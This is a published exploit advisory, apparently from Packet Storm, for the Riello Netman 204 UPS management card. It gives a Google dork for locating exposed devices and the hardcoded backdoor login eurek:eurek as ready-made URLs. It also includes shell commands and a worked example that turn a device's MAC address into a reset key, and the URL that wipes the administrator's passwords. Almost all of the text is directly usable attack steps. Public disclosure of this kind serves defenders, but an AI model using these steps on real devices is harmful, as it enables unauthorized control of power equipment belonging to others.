Netman 204 suffers from backdoor accounts and a password reset vulnerability. The backdoor accounts were already discovered in September of 2016 by Saeed reza Zamania.
604c3bc5a72eb8e9929ea3e43976a09ff9667d1f8bff94b645c84be2b5255741# Exploit Title: Netman 204 Backdoor and weak password recovery function
# Google Dork: intitle:"Netman 204 login"
# Date: 31st Jan 2017
# Exploit Author: Simon Gurney
# Vendor Homepage: blog.synack.co.uk
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
# Version: S14-1 and S15-2
# Tested on: Reillo UPS
# CVE : N/A
Netman 204 cards have a backdoor account eurek:eurek.
This account can be logged with by simply browsing to the URL
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
Such as,
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
Then take characters 2-10, where position 1 is character 1 (not 0).
Such as,
354a65581
Then browse to the url:
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
or
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
Passwords have now been reset.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed